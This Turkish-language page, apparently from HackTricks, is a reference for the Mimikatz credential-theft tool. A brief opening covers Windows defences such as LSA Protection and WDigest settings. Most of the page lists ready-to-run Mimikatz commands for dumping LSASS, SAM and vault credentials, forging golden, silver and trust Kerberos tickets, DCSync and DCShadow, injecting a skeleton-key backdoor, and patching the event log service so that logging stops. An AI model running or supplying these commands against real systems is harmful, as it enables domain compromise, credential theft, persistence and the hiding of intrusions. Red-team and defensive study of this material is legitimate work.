Mimikatz
Last updated
Last updated
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Bu sayfa adsecurity.org sayfasına dayanmaktadır. Daha fazla bilgi için orijinalini kontrol edin!
Windows 8.1 ve Windows Server 2012 R2'den itibaren, kimlik bilgisi hırsızlığına karşı önemli önlemler alınmıştır:
LM hash'leri ve düz metin şifreleri artık güvenliği artırmak için bellekte saklanmamaktadır. "clear-text" şifrelerin LSASS'te önbelleğe alınmamasını sağlamak için HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" kayıt defteri ayarının 0
DWORD değeri ile yapılandırılması gerekmektedir.
LSA Koruması, Yerel Güvenlik Otoritesi (LSA) sürecini yetkisiz bellek okuma ve kod enjeksiyonuna karşı korumak için tanıtılmıştır. Bu, LSASS'in korunan bir süreç olarak işaretlenmesiyle sağlanır. LSA Korumasının etkinleştirilmesi şunları içerir:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa kayıt defterini RunAsPPL
değerini dword:00000001
olarak ayarlayarak değiştirmek.
Bu kayıt defteri değişikliğini yönetilen cihazlar arasında zorunlu kılan bir Grup Politika Nesnesi (GPO) uygulamak.
Bu korumalara rağmen, Mimikatz gibi araçlar belirli sürücüleri kullanarak LSA Korumasını aşabilir, ancak bu tür eylemlerin olay günlüklerinde kaydedilmesi muhtemeldir.
Yönetici kullanıcılar genellikle programları hata ayıklama yeteneği veren SeDebugPrivilege'e sahiptir. Bu ayrıcalık, yetkisiz bellek dökümünü önlemek için kısıtlanabilir; bu, saldırganların bellekten kimlik bilgilerini çıkarmak için kullandığı yaygın bir tekniktir. Ancak, bu ayrıcalık kaldırıldığında bile, TrustedInstaller hesabı özelleştirilmiş bir hizmet yapılandırması kullanarak bellek dökümleri gerçekleştirebilir:
Bu, lsass.exe
belleğinin bir dosyaya dökülmesini sağlar; bu dosya daha sonra başka bir sistemde analiz edilerek kimlik bilgileri çıkarılabilir:
Mimikatz'ta olay günlüğü manipülasyonu iki ana eylemi içerir: olay günlüklerini temizleme ve yeni olayların kaydedilmesini önlemek için Olay hizmetini yamanma. Aşağıda bu eylemleri gerçekleştirmek için komutlar bulunmaktadır:
Komut: Bu eylem, olay günlüklerini silmeyi amaçlar, böylece kötü niyetli faaliyetleri takip etmeyi zorlaştırır.
Mimikatz, standart belgelerinde olay günlüklerini doğrudan komut satırı aracılığıyla temizlemek için doğrudan bir komut sağlamaz. Ancak, olay günlüğü manipülasyonu genellikle belirli günlükleri temizlemek için Mimikatz dışında sistem araçları veya betikler kullanmayı içerir (örneğin, PowerShell veya Windows Olay Görüntüleyici kullanarak).
Komut: event::drop
Bu deneysel komut, Olay Günlüğü Hizmeti'nin davranışını değiştirmek için tasarlanmıştır ve etkili bir şekilde yeni olayların kaydedilmesini önler.
Örnek: mimikatz "privilege::debug" "event::drop" exit
privilege::debug
komutu, Mimikatz'ın sistem hizmetlerini değiştirmek için gerekli ayrıcalıklarla çalışmasını sağlar.
event::drop
komutu daha sonra Olay Günlüğü hizmetini yamalar.
Bir Altın Bilet, alan genelinde erişim taklidi yapmayı sağlar. Ana komut ve parametreler:
Komut: kerberos::golden
Parametreler:
/domain
: Alan adı.
/sid
: Alanın Güvenlik Tanımlayıcısı (SID).
/user
: Taklit edilecek kullanıcı adı.
/krbtgt
: Alanın KDC hizmet hesabının NTLM hash'i.
/ptt
: Bileti doğrudan belleğe enjekte eder.
/ticket
: Bileti daha sonra kullanmak üzere kaydeder.
Örnek:
Silver Ticket'lar belirli hizmetlere erişim sağlar. Ana komut ve parametreler:
Komut: Golden Ticket'e benzer ancak belirli hizmetleri hedef alır.
Parametreler:
/service
: Hedef alınacak hizmet (örn., cifs, http).
Diğer parametreler Golden Ticket ile benzerdir.
Örnek:
Trust Ticket'lar, güven ilişkilerini kullanarak alanlar arasında kaynaklara erişim sağlamak için kullanılır. Ana komut ve parametreler:
Komut: Golden Ticket'e benzer ancak güven ilişkileri için.
Parametreler:
/target
: Hedef alanın FQDN'si.
/rc4
: Güven hesabı için NTLM hash'i.
Örnek:
Biletleri Listele:
Komut: kerberos::list
Mevcut kullanıcı oturumu için tüm Kerberos biletlerini listeler.
Önbelleği Geç:
Komut: kerberos::ptc
Önbellek dosyalarından Kerberos biletlerini enjekte eder.
Örnek: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Bileti Geç:
Komut: kerberos::ptt
Başka bir oturumda Kerberos biletini kullanmaya olanak tanır.
Örnek: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Biletleri Temizle:
Komut: kerberos::purge
Oturumdan tüm Kerberos biletlerini temizler.
Çatışmaları önlemek için bilet manipülasyon komutlarını kullanmadan önce faydalıdır.
DCShadow: Bir makineyi AD nesne manipülasyonu için geçici olarak DC gibi davranmasını sağlar.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Şifre verilerini talep etmek için bir DC'yi taklit eder.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: LSA'dan kimlik bilgilerini çıkarır.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Bir bilgisayar hesabının şifre verilerini kullanarak bir DC'yi taklit eder.
Orijinal bağlamda NetSync için özel bir komut sağlanmamıştır.
LSADUMP::SAM: Yerel SAM veritabanına erişim sağlar.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Kayıt defterinde saklanan sırları deşifre eder.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Bir kullanıcı için yeni bir NTLM hash'i ayarlar.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: güven ilişkisi kimlik doğrulama bilgilerini alır.
mimikatz "lsadump::trust" exit
MISC::Skeleton: LSASS'a bir arka kapı enjekte eder.
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: Yedekleme haklarını edinir.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Hata ayıklama ayrıcalıklarını elde eder.
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: Oturum açmış kullanıcılar için kimlik bilgilerini gösterir.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Bellekten Kerberos biletlerini çıkarır.
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: SID ve SIDHistory'yi değiştirir.
Ekle: mimikatz "sid::add /user:targetUser /sid:newSid" exit
Değiştir: Orijinal bağlamda değiştir için özel bir komut yoktur.
TOKEN::Elevate: Token'ları taklit eder.
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: Birden fazla RDP oturumuna izin verir.
mimikatz "ts::multirdp" exit
TS::Sessions: TS/RDP oturumlarını listeler.
Orijinal bağlamda TS::Sessions için özel bir komut sağlanmamıştır.
Windows Vault'tan şifreleri çıkarır.
mimikatz "vault::cred /patch" exit
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)